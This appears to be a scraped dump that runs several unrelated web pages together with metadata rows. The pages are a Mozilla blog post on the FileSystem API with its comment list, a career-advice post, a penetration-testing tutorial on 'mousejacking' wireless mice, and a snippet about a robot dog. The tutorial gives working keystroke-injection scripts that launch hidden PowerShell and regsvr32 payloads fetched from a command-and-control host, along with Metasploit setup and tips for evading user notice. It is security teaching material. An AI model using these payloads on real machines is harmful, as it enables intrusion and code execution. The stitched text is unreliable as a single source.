Firefox does support the `blob:`
URL scheme, which does allow loading data from a Blob anywhere where URLs can be used. However it doesn’t have the above mentioned capabilities. This is something that I’d really like to find a solution for. If we can’t find a better solution, implementing the Google specifications is definitely an option.
## Conclusions
As always when talking about features to be added to the web platform it’s important to talk about use cases and capabilities, and not jump directly to a particular solution. Most of the use cases that the FileSystem API aims to solve can be solved in other ways. In my opinion many times in better ways.
This is why we haven’t prioritized implementing the FileSystem API, but instead focused on things like making our IndexedDB implementation awesome, and coming up with a good API for low-level file manipulation.
Focusing on IndexedDB has also meant that we very soon have a good API for basic file storage available in 3 browsers: IE10, Firefox and Chrome.
On a related note, we just fixed the last known spec compliance issues in our IndexedDB implementation, so Firefox 16 will ship with IndexedDB unprefixed!
As always, we’re very interested in getting feedback from other people, especially from web developers. Do you think that FileSystem API is something we should prioritize? If so, why?
## About Jonas Sicking
Jonas has been hacking on web browsers for over a decade. He started as a open source contributor in 2000 contributing to the newly open sourced mozilla project. In 2005 he joined mozilla full time and has since been working on the DOM and other parts of the web platform. He is now the Tech Lead of the Web API project at mozilla as well as an editor for the IndexedDB and File API specifications at W3C.
## 117 comments
Neel MehtaJuly 5th, 2012 at 13:41Devon GovettJuly 5th, 2012 at 13:45Jonas SickingJuly 5th, 2012 at 13:53Marat DenenbergJuly 5th, 2012 at 13:50Devon GovettJuly 5th, 2012 at 14:01Jonas SickingJuly 5th, 2012 at 14:23Robert KaiserJuly 5th, 2012 at 15:47Devon GovettJuly 5th, 2012 at 16:16Devon GovettJuly 5th, 2012 at 13:56Devon GovettJuly 5th, 2012 at 13:57Robert NymanJuly 5th, 2012 at 14:21Jonas SickingJuly 5th, 2012 at 16:26Devon GovettJuly 5th, 2012 at 16:42Jonas SickingJuly 5th, 2012 at 16:56Samuel ErdtmanJuly 5th, 2012 at 15:12DanielJuly 5th, 2012 at 16:03Jonas SickingJuly 5th, 2012 at 16:19Angelo BorsottiSeptember 15th, 2012 at 01:17DanielJuly 5th, 2012 at 16:25Jonas SickingJuly 5th, 2012 at 16:31DanielJuly 5th, 2012 at 16:36Style ThingJuly 5th, 2012 at 23:47Tane PiperJuly 6th, 2012 at 01:22Jonas SickingJuly 9th, 2012 at 20:50Jussi KalliokoskiJuly 6th, 2012 at 04:18Jonas SickingJuly 9th, 2012 at 20:51OlegJuly 6th, 2012 at 08:43Jonas SickingJuly 9th, 2012 at 22:04Eric UhrhaneJuly 10th, 2012 at 16:55Jonas SickingJuly 9th, 2012 at 22:05Eric BidelmanJuly 6th, 2012 at 09:23Eric UhrhaneJuly 6th, 2012 at 17:10Jonas SickingJuly 9th, 2012 at 22:18Brian StellMarch 21st, 2013 at 16:17Jonas SickingMarch 22nd, 2013 at 11:38Brian StellMarch 22nd, 2013 at 13:26Jonas SickingMarch 22nd, 2013 at 14:10pdJuly 7th, 2012 at 00:44Jonas SickingJuly 9th, 2012 at 22:29Eric UhrhaneJuly 10th, 2012 at 17:01John ThomasJuly 10th, 2012 at 05:58Eric UhrhaneJuly 10th, 2012 at 18:41Joran GreefJuly 19th, 2012 at 00:48Jonas SickingJuly 19th, 2012 at 01:54Joran GreefJuly 19th, 2012 at 03:19BenzOctober 20th, 2012 at 13:07Jonas SickingOctober 21st, 2012 at 10:13BenzOctober 21st, 2012 at 11:04Daniel O’CallaghanJanuary 3rd, 2013 at 21:13Michaela MerzJanuary 13th, 2013 at 18:26Jonas SickingJanuary 14th, 2013 at 18:23Michaela MerzJanuary 17th, 2013 at 15:45Jonas SickingJanuary 17th, 2013 at 16:49Michaela MerzJanuary 18th, 2013 at 01:37Michaela MerzJanuary 18th, 2013 at 01:51Jonas SickingJanuary 18th, 2013 at 02:13Jonas SickingJanuary 18th, 2013 at 02:16Michaela MerzJanuary 18th, 2013 at 02:50Jonas SickingJanuary 18th, 2013 at 03:00BenzJanuary 18th, 2013 at 04:03Michaela MerzJanuary 18th, 2013 at 14:25Jonas SickingJanuary 18th, 2013 at 14:57Michaela MerzJanuary 18th, 2013 at 15:06BenzJanuary 18th, 2013 at 15:29Michaela MerzJanuary 18th, 2013 at 15:43Geoff FlarityJanuary 19th, 2013 at 06:54maxw3stFebruary 1st, 2013 at 21:46Michaela MerzFebruary 4th, 2013 at 13:02John McLaneFebruary 9th, 2013 at 09:48Anthony CaudillFebruary 14th, 2013 at 08:52Jonas SickingFebruary 14th, 2013 at 20:40Jonas SickingFebruary 14th, 2013 at 20:45Anthony CaudillFebruary 14th, 2013 at 23:40Michaela MerzFebruary 15th, 2013 at 05:39Jonas SickingFebruary 15th, 2013 at 06:13Michaela MerzFebruary 15th, 2013 at 06:28Jonas SickingFebruary 15th, 2013 at 07:12Rob HigginsFebruary 21st, 2013 at 18:18Anthony CaudillMarch 4th, 2013 at 10:27Angelo BorsottiMarch 4th, 2013 at 11:49RobMarch 4th, 2013 at 22:34Brett ZamirMarch 13th, 2013 at 02:51Michaela MerzMarch 5th, 2013 at 08:21Angelo BorsottiMarch 5th, 2013 at 11:37Jonas SickingMarch 5th, 2013 at 11:45Michaela MerzMarch 5th, 2013 at 14:17Angelo BorsottiMarch 5th, 2013 at 16:42Michaela MerzMarch 5th, 2013 at 18:14Angelo BorsottiMarch 6th, 2013 at 00:54Michaela MerzMarch 6th, 2013 at 01:30Angelo BorsottiMarch 6th, 2013 at 02:25Rob HigginsMarch 6th, 2013 at 13:21Angelo BorsottiMarch 6th, 2013 at 16:59Rob HigginsMarch 6th, 2013 at 19:04Angelo BorsottiMarch 7th, 2013 at 00:50Anthony CaudillMarch 12th, 2013 at 23:18Anthony CaudillMarch 12th, 2013 at 23:35Brett ZamirMarch 13th, 2013 at 03:25Brett ZamirMarch 13th, 2013 at 03:46Rob HigginsMarch 14th, 2013 at 11:08Rob HigginsMarch 14th, 2013 at 12:09Anthony CaudillMarch 14th, 2013 at 12:21Brett ZamirMarch 14th, 2013 at 16:49Brett ZamirMarch 14th, 2013 at 16:37Rob HigginsMarch 14th, 2013 at 16:50Angelo BorsottiMarch 14th, 2013 at 13:17Rob HigginsMarch 14th, 2013 at 13:50Angelo BorsottiMarch 15th, 2013 at 00:08Brett ZamirMarch 14th, 2013 at 18:21Brett ZamirMarch 14th, 2013 at 18:31Michaela MerzMarch 15th, 2013 at 02:25RobMarch 16th, 2013 at 13:22Brett ZamirMarch 16th, 2013 at 18:51Angelo BorsottiMarch 16th, 2013 at 15:34Brett ZamirMarch 16th, 2013 at 18:53RobMarch 17th, 2013 at 10:43Brett ZamirMarch 18th, 2013 at 18:50
| true | true | true |
A question that I get asked a lot is why Firefox doesn't support the FileSystem API. Usually, but not always, they are referring specifically to the FileSystem and FileWriter specifications ...
|
2024-10-12 00:00:00
|
2012-07-05 00:00:00
|
webpage
|
mozilla.org
|
Mozilla Hacks – the Web developer blog
| null | null |
|
16,728,486 |
http://www.mooreds.com/wordpress/archives/2939
|
Leaving well
| null |
Leaving a company in a way that is fair to both you and your company can be difficult. When employed, we spend a large portion of our waking hours at work. You may be leaving a group of people you loved, a toxic environment, a place you’ve outgrown, or a place you’ve loved and just need to move on from for personal reasons. Because of the amount of time invested and the multiplicity of emotional circumstances, it can be difficult to leave well. Below are some thoughts on this career transition, however, I’m not writing about why you should leave, just how the process should go once you’ve made that decision. (Note that some of these apply to transitioning positions within a company.)
**Before you are thinking about leaving**
- Prepare to leave well before you think about leaving by documenting your decisions, processes and systems. This has the added benefit of letting you do better in your current position. When you write down how you do a task, it gives you the chance to review it and consider optimizations, as well as revisit it in the future and perform the task just as well. Make sure to date all documents. When you revisit a system or process, revisit the document.
- Watch how other departing employees are treated. Expect to be treated in a similar manner. Some companies want to usher folks out quickly (to the point of just paying their standard two weeks notice immediately and having them depart) while others will be more flexible. Some managers will treat departing employees with compassion and respect. Others may not.
- You won’t be able to effect change at the company once you have publicly decided to depart. If you want to effect change, stay at the company work within the system.
**Once you’ve decided to leave**
- Save and put that money into a liquid savings account. How much? As much as you can. This will make the transition less scary and allow you greater flexibility.
- Decide on boundaries and stick to them. Being helpful with the transition doesn’t mean you have to be a doormat.
- It’s always easier to find a job when you have a job. Think about reactivating old networks, inviting folks for coffee, and checking out the job market while you are still in your position.
- When you decide to leave, give as much notice as possible. Since you’ve been observing how folks are treated and you know your own situation, adjust for those factors. However, I’ve found letting managers know about my departure with plenty of notice ensures a smooth departure. Personally, I’ve given up to two months of notice.
- I’ve never had a counteroffer, but I’ve read that accepting them is a poor choice.
- Make a plan with your manager. Take point on this, as you are the person who knows your job best. This plan should be your first task after you’ve told your manager you are departing.
- Keep a spreadsheet of departure tasks including owner, date to be completed and description. Sometimes important things are overlooked. This is where having documentation (see step 1) is helpful, but also look at your to-do lists, your and calendar entries.
**Telling your fellow employees**
- Let the company control the narrative about when you are leaving, including when to tell the team. However, if you are approaching your departure date and no one on the team knows, push your manager to publicize it.
- You will likely have many reasons for your departure. Pick a major, true, banal reason or two and answer with that when team members ask why you are leaving. There’s no need to get into every grievance, reason or issue you had.
- Your decisions will have less weight once you announce your departure. This is natural; team members that are staying discount your opinions because you won’t be living with the consequences. Prepare yourself for this.
- Consider offering to consulting to the company if it makes sense for you and the timing is right. Charge a fair market rate. Realize that stepping into this role may be difficult emotionally.
- Once your exit is public, your focus should be bringing other employees up to speed so they can do your job when you’re gone. It may feel good to bang out one more bugfix or initiative and if you have time to do that, great, but your primary focus should be on documentation and knowledge transfer.
- Realize that this transition will feel momentous to you, but that it is far less important to everybody else (both inside and outside the company). A company should have no irreplaceable employees.
- Treat everyone as fairly as possible. Remember that you may be working with some of these folks in a few years’ or decades’ time.
- Be professional and courteous (I can’t think of a time when this is bad advice, but at moments of transition it is especially important).
Leaving a job is a very personal decision and will impact your career. Spend time thinking about how to leave well, treat everyone with respect and have a plan.
| true | true | true | null |
2024-10-12 00:00:00
|
2018-04-01 00:00:00
| null | null |
mooreds.com
|
mooreds.com
| null | null |
7,035,532 |
https://medium.com/p/38afa2d7df9b
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
7,771,875 |
http://mjg59.dreamwidth.org/31714.htm
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
15,074,905 |
https://toshellandback.com/2017/08/16/mousejack/
|
Peripheral Pwnage
|
Jonathan
|
# Peripheral Pwnage
**Hostile Airwaves: Mousejacking**
On internal engagements, poisoning name resolution requests on the local network (à la Responder) is one of the tried and true methods of obtaining that coveted set of initial Domain credentials. While this approach has worked on many clients (and has even given up Domain Admin in less time than it takes to grab lunch), what if Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NTB-NS) protocols are configured securely or disabled? Or, what if Responder was so successful that you now want to prove other means of gaining that initial foothold? Let’s explore…
*Always*prove multiple means of access whenever possible during engagements!
There are a multitude of attacks a penetration tester can leverage when conducting physical walkthroughs of client spaces. One of the more interesting, and giggle-inducing, involves exploiting wireless peripherals. This technique, known as “mousejacking”, gained some notoriety in early 2016 when Bastille, a firm specializing in wireless and Internet of Things (IoT) threat detection, released a whitepaper documenting the issue. At a high-level, the attack involves exploiting vulnerable 2.4 GHz input devices by injecting malicious keystrokes (even if the target is only using a wireless mouse) into the associated USB dongle. This is made possible because many wireless mice (and a handful of keyboards) either don’t use encryption between the device and its paired USB dongle, or will accept rogue keystrokes even if encryption is being utilized. WIRELESS WHOOPSIE!
**You Vulnerable, Bro?**
At this point, you are probably wondering which input devices are vulnerable. While a more comprehensive list can be found on Bastille’s website, I’ve personally had the most experience with Microsoft and Logitech products while on engagements.
Vulnerable Microsoft products include, and most certainly aren’t limited to, the following devices:
With Logitech, devices that are likely to be affected are ones that leverage the “Unifying” dongle, which is meant to work with a large number of wireless input devices the company produces. The dongle can be easily identified by an orange star printed on the hardware:
Have Your Hardware Handy
To help us conduct our mousejacking attack, we need to first acquire SeeedStudio’s Crazyradio PA USB dongle and antenna. This is a ~$30 long-range 2.4 GHz wireless transmitter (which uses the same series of transceiver, Nordic Semiconductor’s nRF24L, that many of the vulnerable devices leverage) that is intended for use on hobby drones; however, we are going to flash the firmware (courtesy of Bastille) to weaponize it for our own nefarious purposes. *EVIL CACKLE* This new firmware will allow the dongle to act promiscuously, adding packet sniffing and injection capabilities. Once the Crazyradio PA is in hand, the instructions for setting it up with new firmware can be found here.
It is also helpful to have one or more known vulnerable devices on hand to leverage for testing. In my personal lab, I am utilizing Logitech’s m510 Wireless Mini Mouse and Microsoft’s Wireless Mobile Mouse 4000.
**JackIt In The Office (But Don’t Get Caught…)**
The software of choice for this scenario is going to be JackIt, a python script written by phiksun (@phikshun) and infamy (@meshmeld). The project leverages the work of Bastille and simplifies both identification of devices and the attack delivery. Using Kali, or your distribution of choice, go ahead and grab the script:
$ git clone https://github.com/insecurityofthings/jackit.git /opt/
Take a gander at the `README.md`
file and follow the instructions to install JackIt. Once that is completed, ensure that the flashed Crazyradio PA dongle is plugged in prior to starting up the tool. Failure to do so will cause JackIt to throw an error. Let’s start by running JackIt without any arguments, which will put the tool into reconnaissance mode, allowing you to see what wireless input devices are in range:
/opt/jackit/$ ./jackit.py
Take a few moments to inspect JackIt’s output before continuing:
When a device is discovered, a new row is created with a number assigned in the `KEY`
column based on order of initial appearance. You will need to reference this number when targeting a particular device (more on that shortly). The `ADDRESS`
column shows the hardware MAC address for the wireless device. This can be useful when determining whether you’ve previously seen / targeted a particular device (JackIt does not keep track of your previously targeted devices, so when working with multiple devices, you’ll need to keep track of them yourself). The `TYPE`
column displays the brand of the device once enough packets are captured by JackIt to accurately identify. Note that in the screenshot above that the second device (`KEY 2`
) has not been adequately fingerprinted yet.
The `COUNT`
and `SEEN`
columns relate to wireless communication detected between a device and its dongle. `COUNT`
refers to the number of times communication between the device and dongle were picked up by the Crazyradio PA. `SEEN`
informs us how many seconds have passed since the last communication was detected. Devices that haven’t been detected in a while are either a) not being actively used at the moment or b) no longer in range. With the former, there is a potential that the user has locked their computer and stepped away. In either case, these are probably not ideal targets.
The `CHANNELS`
column notates the channel(s) that the wireless peripheral and dongle are utilizing to communicate. Lastly, `PACKET`
shows the contents of the last captured communication. For our purposes, we can ignore these two column(s).
To actually exploit devices that are discovered, JackIt will need to know what malicious keystrokes to send to a victim. The tool takes commands in Ducky Script format, the syntax leveraged by the Rubber Ducky, a keystroke-injecting USB thumb drive created by Hak5. Whereas a Rubber Ducky requires Duckyscript to be encoded prior to being used for exploitation, this is not the case for JackIt… simply pass the “plaintext” commands in a text file. If you are unfamiliar with Duckyscript, please refer to Hak5’s readme page to get your learn on.
A recommended starting point for a Duckyscript mousejacking template can be found below. Given that it may be possible for a user to see a mousejacking attempt in progress, an attempt has been made to streamline the attack as much as possible without sacrificing accuracy. `DELAY`
times are much shorter than with traditional Rubber Ducky scripts as there is no need to wait for driver installation since we are not physically plugging a USB device into the victim’s machine. In addition to keeping the `DELAY`
values low, it is also helpful to shorten the actual attack payload as much as possible. The reason here is twofold, less keystrokes means less time to send characters to the victim (each keystroke is literally “typed” out on the target and can draw attention to the attack) as well as lessening the chance of any data-in-transit issues (wireless attacks can be unstable, with possible lost or malformed characters). We will discuss these types of issues in greater detail later on.
```
GUI r
DELAY 300
STRING ***INSERT MALICIOUS PAYLOAD HERE***
DELAY 300
ENTER
ENTER
```
Using the script above, JackIt would open the Windows “run” prompt, pause briefly, pass whatever malicious payload we specify, pause briefly, then submit the command. To give you an idea of the speed of keystroke injection as well as user’s visibility of active mousejacking attack, I have recorded a clip of sending a string of character’s to a victim’s machine using the above template:
As you can see, even though we have taken steps to steamline the attack, there is still a window (no pun intended, I promise!) in which a user could be alerted to our activities.
*Note: If the keystrokes injected had been calling a valid program such as *`powershell.exe`
*, the window would have closed at the end of the injection once the program had executed. In this case, the submitted run prompt window popped back up and highlighted the text when it was unable to properly process the command.*
**From Mouse To RAT**
Next stop, Exploitation Station! For most scenarios, there will be a minimum of two machines required. The “attack” machine will have the Crazyradio PA dongle attached and JackIt running. The operator of this machine will walk near or through the target’s physical workspace in order to pick up wireless input devices in use. Any payloads submitted by this machine will direct the victims to reach out to the second machine which is hosting the command & control (C2) server that is either sitting somewhere on the client’s internal network or up in the cloud.
So, what malicious payload should we use? PowerShell one-liners that can deliver remotely hosted payloads are a great starting point. The Metasploit Framework has a module (`exploit/multi/script/web_delivery`
) built specifically for this purpose.
Let’s take a look at the Web Delivery module’s options:
Note the default exploit target value is set to Python. To leverage PowerShell as the delivery mechanism we will need to run `SET TARGET 2`
. This will ensure our generated payload uses the PowerShell download cradle pentesters and malicious actors have come to love! In most cases, we will want to set both `SRVHOST`
and `LHOST`
to point to the machine running the Web Delivery module, which is acting as the C2 server. `SRVPORT`
will set the port for hosting the malicious payload while `LPORT`
sets the port for the payload handler. While it is usually recommended that you use a stageless payload (such as `windows/meterpreter_reverse_https`
) whenever possible in an attempt to increase the chance of successfully bypassing any anti-virus solutions that may be in place, attempting to do so with the Web Delivery module will result in an error. This is due to the payload exceeding Window’s command line limit of approximately 8192 characters (Cobalt Strike payloads bypass this limitation through compression, but that’s another deep dive altogether). Given this limitation, let’s use a staged payload instead: `windows/meterpreter/reverse_https`
. Lastly, let’s set the `URIPATH`
to something short and sweet (`/a`
) to avoid Metasploit generating a random multi-character string for us. Once everything is set up, the module’s options should look similar to the following:
Let’s go ahead and run the module to generate our PowerShell one-liner and start our payload handler:
As mentioned previously, the preference for this type of attack is to have as short of a string as possible. What the Web Delivery module generates is a little longer than I like for most mousejacking attempts:
powershell.exe -nop -w hidden -c $v=new-object net.webclient;$v.proxy=[Net.WebRequest]::GetSystemWebProxy();$v.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $v.downloadstring('http://192.168.2.10/a');
This doesn’t look like a vanilla PowerShell download cradle, does it? The module generates a random variable (`$v`
in this example) and uses that to obfuscate the cradle in order to bypass some defenses. Additionally, there are commands that make the cradle proxy-aware which might assist in the payload successfully calling out to the Internet (potentially helpful if your C2 server resides in the cloud).
We can certainly shorten this payload and have it still work, but we have to consider the benefits vs. tradeoffs of doing so. If our C2 server is internal to the client’s network, we can remove the proxy-related commands and still leave some obfuscation of the cradle intact. Or, if we are looking for the absolutely shortest string, we can remove all obfuscation and restore a more standard-looking download cradle. It ultimately comes down to evading user detection vs. evading host-based protections. Below are examples of each modification:
powershell.exe -nop -w hidden -c $v=new-object net.webclient;IEX $v.downloadstring('http://192.168.2.10/a'); powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.2.10/a');
Now that we’ve set up our C2 server and have our malicious string in place, we can modify the Duckyscript template from earlier, making sure to save it locally:
```
GUI r
DELAY 300
STRING powershell.exe -nop -w hidden -c IEX(new-object net.webclient).downloadstring('http://192.168.2.10/a');
DELAY 300
ENTER
ENTER
```
To use JackIt for exploitation vs. reconnaissance, simply call the Duckyscript file with the `--script`
flag:
/opt/jackit/$ ./jackit.py --script ducky-script.txt
In the screenshot below, we can see that we have discovered two wireless peripherals that have been fingerprinted by JackIt. When we are ready to launch our mousejack attack, simply press `CTRL-C`
:
We can select an individual device, multiple devices, or simply go after all that were discovered. Once we’ve made our selection and hit `ENTER`
, our specified attack will launch. Depending on the brand of device targeted, you may see many `10ms add delay`
messages on your screen before the completion of the script. You’ll know that JackIt has finished when you see the following message: `[+] All attacks completed`
.
Let’s take a look at our Web Delivery module and see if any of the attacks were successful:
Looks like we got a hit! While we had attempted to mousejack two targets, only one successfully called back. There are several reasons why a mousejacking attempt might fail and we will discuss those shortly.
So, we’ve now successfully used Metasploit’s Web Delivery module in conjunction with JackIt to compromise a wireless peripheral. There are other frameworks we can utilize that offer similar PowerShell one-liners, including Cobalt Strike and Empire. Let’s briefly talk about Cobalt Strike, since there is a non-PowerShell payload that I like to use for mousejacking.
Cobalt Strike has an attack called Scripted Web Delivery, which is similar to Metasploit’s Web Delivery, but offers more payload options. While there is a PowerShell option available, I am partial to the `regsvr32`
payload as it’s short and sweet; however, this does require Microsoft Office to be installed on the target system as it leverages Visual Basic for Applications (VBA) macros and Component Object Model (COM) scriptlets:
The payload looks similar to the following once everything is configured:
regsvr32 /u /n /s /i:http://192.168.2.10:80/a scrobj.dll
How this payload works is outside the scope of this article, but if you’re interested in learning more, please check out Casey Smith’s (@subTee) blog post.
Before we continue, I want to mention that I’ve had issues starting up JackIt again after a successful attack, receiving an error message like the one below:
I’ve been able to reproduce this error on Kali running within VMWare as well as a standalone Kali box. Let me know if you experience this phenomenon on other flavors of Linux. The only way to get around this error other than restarting the operating system is to unbind and then rebind the USB drivers for the CrazyRadio PA dongle. This can be achieved by unplugging and then replugging in the CrazyRadio PA or by issuing some specific commands via the console. Luckily for you, my awesome coworker Dan Astor (@illegitimateDA), wrote a Bash script to do all that magic for you. Just simply run the following script whenever the error message shows its ugly face and then rerun JackIt:
```
#!/bin/bash
#Tool :: USB device reset script developed for use with JackIt & CrazyRadio PA USB Adapter
#Author :: Dan Astor (@illegitimateDA)
#Usage :: After running an attack with JackIt, run the script to reset the USB adapter. This will fix the USB Core Error Python throws.
#Unbind USB devices from the system and rebind them
for device in /sys/bus/pci/drivers/uhci_hcd/*:*; do
#Unbind the device
echo "${device##*/}" > "${device%/*}/unbind"
#Bind the device
echo "${device##*/}" > "${device%/*}/bind"
done
```
**I Was Told There Would Be Shells…**
So, here we are, owning and pwning unsuspecting victims who fail to know the danger in the dongle. But, what if all doesn’t go according to plan? What if we unleash an attack on multiple peripherals only to discover that there are no shells waiting for us? THE HORROR!
First things first: let’s discuss range. Quite honestly, the antenna that comes with the CrazyRadio PA isn’t an amazing performer despite the dongle being advertised as “long-range.” It only takes one missing or malformed character in our attack string to rain on our pwnage parade. I’ve seen missing characters on more than one occasion and have even witnessed run prompts that have endless string of forward slashes that prevent the run prompt from closing, leaving the user no choice but to reboot the affected computer. These situations are not desirable as we don’t receive shells (BOO!), users are potentially alerted to our attacks (BOO TIMES TWO!), and we may even negatively affect the productivity of our client’s employees (CLIENT RAGE!). Based on my experience, I believe many of these issues can be avoided by improving signal strength. I’ve had some luck with powerful Alfa antennas, such as the 9dBi Wifi Booster. The only issue with this particular choice is that one tends to draw a lot of attention walking around with a 15″ antenna sticking out of the side of a laptop. 😛 My advice: experiment with different options and find one that you find reliable at the greatest range.
Second thing to note: Microsoft wireless devices can be tricky little buggers to target. This is because unlike Logitech peripherals, Microsoft utilizes sequence numbers for every communication between device and dongle. JackIt monitors the sequence numbers but if the user performs some action (clicks a button, moves the mouse, etc.) before the attack is delivered, the sequence numbers will no longer align and we will once again find ourselves with missing or malformed characters. While sometimes difficult to pull off, I prefer to have “eyes on” a target if they are using a Microsoft peripheral in order to figure out the ideal time to launch the attack. If I’m completely blind and have both Microsoft and Logitech devices in range, I tend to err on the side of caution and target a Logitech device.
Third consideration: how we choose to construct the URL that points to our payload matters. I found this out the hard way on a recent engagement. Leveraging Cobalt Strike, I had hosting a payload with a URL similar to the examples presented earlier in this post (`http://ip_address/a`
). After launching an attack on a promising target, I discovered that there was no shell waiting for me on the C2 server. Upon inspecting Cobalt Strike’s Web Log, I saw a message similar to the following:
This was perplexing; why did my target attempt to reach an URL ending in a capital `/A`
? Had a somehow mistyped the attack string in my DuckyScript file? After a quick check, this was ruled out. Then, it hit me… the user must have had `CAPS LOCK`
enabled! I was shell-blocked by something so stupid! Ever since that engagement, I leverage numbers (i.e. `/1`
) in my mousejacking URLs to prevent similar issues in the future.
Lastly, there are some remediation actions that the client may have taken. Which brings us to…
**What’s A Poor Dongle To Do?**
The easiest solution to the problem of mousejacking is relatively obvious: stick to wired peripherals (or migrate to Bluetooth). That being said, both Microsoft and Logitech have attempted mitigation strategies for their affected products if you are absolutely in love with your 2.4 GHz device.
Microsoft released a Security Advisory in April 2016 with a corresponding *optional* update. The update attempts to add more robust filtering at the dongle so that rogue keystrokes are detected and properly discarded. Researchers who have tested the update say it’s relatively “hit or miss”, with some devices remaining vulnerable even after the patch is applied.
Logitech has taken a different approach, requiring users to *manually* apply a firmware update in order to remedy the issue. It’s a multi-step procedure that may prove difficult for less technical end users to apply or too cumbersome for IT departments to handle a massive manual update across the entire user population.
Given these facts, I have a feeling that we will be finding mousejack-able devices within enterprises for a while to come. If within the scope of your engagement, consider adding mousejacking to your toolbox of destruction!
## Erlend
Protip, run the jackit module with the –reset flag.
## Jonathan
Protip indeed! I’ll be sure to update the blog post!
| true | true | true |
Hostile Airwaves: Mousejacking On internal engagements, poisoning name resolution requests on the local network (à la Responder) is one of the tried and true methods of obtaining that coveted set of initial Domain credentials. While this approach has worked on many clients, what if Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NTB-NS) protocols are configured securely or disabled? Or, what if Responder was so successful that you now want to prove other means of gaining that initial foothold? There are a multitude of attacks a penetration tester can leverage when conducting physical walkthroughs of client spaces. One of the more interesting, and giggle-inducing, involves exploiting wireless peripherals. This technique, known as "mousejacking", involves exploiting vulnerable 2.4 GHz input devices by injecting malicious keystrokes (even if the target is only using a wireless mouse) into the receiving USB dongle. This is made possible because many wireless mice (and a handful of keyboards) either don't use encryption between the device and its paired USB dongle, or will accept rogue keystrokes even if encryption is being utilized. Let's explore...
|
2024-10-12 00:00:00
|
2017-08-16 00:00:00
| null |
article
|
toshellandback.com
|
To Shell And Back: Adventures In Pentesting
| null | null |
19,276,809 |
https://www.citylab.com/equity/2019/02/study-airbnb-cities-rising-home-prices-tax/581590/
|
Bloomberg
| null |
To continue, please click the box below to let us know you're not a robot.
Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy.
For inquiries related to this message please contact our support team and provide the reference ID below.
| true | true | true | null |
2024-10-12 00:00:00
| null | null | null | null | null | null | null |
26,486,704 |
https://www.windy.com
| null | null | null | true | true | false | null |
2024-10-12 00:00:00
| null | null | null | null | null | null | null |
12,243,377 |
https://www.experfy.com/blog/how-to-become-a-data-scientist-part-2-3
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
11,751,812 |
http://www.nola.com/outdoors/index.ssf/2016/05/mount_everest_deaths_missing_t.html
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
12,014,214 |
http://www.overcomingbias.com/2016/06/against-prestige.html#comments
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
15,273,533 |
https://maziar.io/blog/react-native-development-tips/
|
React Native: Tips for Successful App Development • Maz Ahmadi's Blog
|
Maz Ahmadi
|
React Native is an impressive library for developing cross-platform mobile apps. Below are a few things that I wish I had known when I first started working with React Native.
## Actively Develop on Both Platforms
This is a common mistake, and one that I made early on. I used to extensively develop features on iOS without testing them on Android during development. React Native is a multi-platform tool but there are lots of little things that behave differently on Android in comparison to iOS. It’s best to actively develop for both platforms early on in order to save yourself time and effort in the long-run.
## Setup Automated Testing
One thing that I wished I did early on was to setup automated testing. As your app grows, the amount of time that it takes to manually test for regressions make it a daunting task. Get familiar with tools like Jest & Calabash. Figuring out your automated testing early on prevents bugs from sneaking past QA.
## Test on Real Devices
If you’re planning to support multiple versions of iOS, or any version of Android, get real devices and use them for testing. Android has a myriad of variety when it comes to screen sizes, hardware, and manufacturer-variants of the Android OS. Continuous integration tools like Buddybuild make it easy to get your app out in the hands of real testers.
## Don’t Be Afraid of Native Code
Consider learning Objective-C/Swift and Java/Kotlin. React Native a great tool that will speed up development for targeting multiple mobile platforms. At some point however, you may need to expose functionality that doesn’t exist in the core library. Thankfully, React Native’s JavaScript bridge has a pleasant API to work with. It’s even possible to integrate React Native views with an existing native app. Even if you don’t need to port functionality, doing so for fun will teach you about how React Native works under the hood. Getting a good understanding of the inner-workings of the library will make you a more successful React Native developer.
## Monitor Native Logs
If you use native modules on Android, you should use Logcat to check for native warnings and errors. On Android, warnings and logs are not automatically bridged to the JavaScript runtime (as it is with *NSLog* on iOS). It is the responsibility of the developer to do so. Android Monitor greatly simplifies this task and will even let you analyze memory and CPU usage.
## Upgrade React Native with Caution
Keep an eye on the RN community website. RN has a monthly release cycle. Since it is still a fairly new library, the APIs are changing quickly. Before updating to a new version in production, make sure that all of your dependent libraries are compatible with the RN version that you’re planning to upgrade to.
That’s it for now! If you have questions about React Native, or if you need help with your React Native project, feel free to get in touch.
| true | true | true |
A list of tips and tricks that I wish I had known when I first started working with a React Native mobile app targeting iOS and Android.
|
2024-10-12 00:00:00
|
2017-09-18 00:00:00
|
article
|
maziar.io
|
Maz Ahmadi's Blog
| null | null |
|
2,699,396 |
http://www.shanetomlinson.com/2011/javascript-inheritance-super/
|
This domain name has been registered with Gandi.net
| null |
# This domain name has been registered with Gandi.net
**View the WHOIS results of shanetomlinson.com** to get the domain’s public registration information.
**shanetomlinson.com**
is unavailable
Want your own domain name?
Learn more about the domain name extensions we manage
| true | true | true |
This domain name has been registered with Gandi.net. It is currently parked by the owner.
|
2024-10-12 00:00:00
|
2023-01-01 00:00:00
| null | null | null | null | null | null |
11,198,554 |
http://spectrum.ieee.org/automaton/robotics/military-robots/two-of-googles-most-famous-dogs-really-dont-get-along#.VtS0S4WN9x4.hackernews
|
Two of Google's Most Famous Dogs Really Don't Get Along
|
Evan Ackerman
|
You may recognize one of the dogs in this picture: we’re pretty sure it’s Andy Rubin’s dog, ~~Alex~~ Cosmo [we’ve just been notified that the dog’s name is in fact Cosmo, and Cosmo not only “contributes to most big decisions at Playground” but also serves as its head of security]. Andy Rubin is the co-founder of Android, and for about a year, he managed the robotics program at Google (now known as Alphabet). More recently, he’s been running a hardware incubator called Playground, which has enough clout to summon up another robotic dog with Google ties: Boston Dynamics’ Spot.
Cosmo and Spot do not get along.
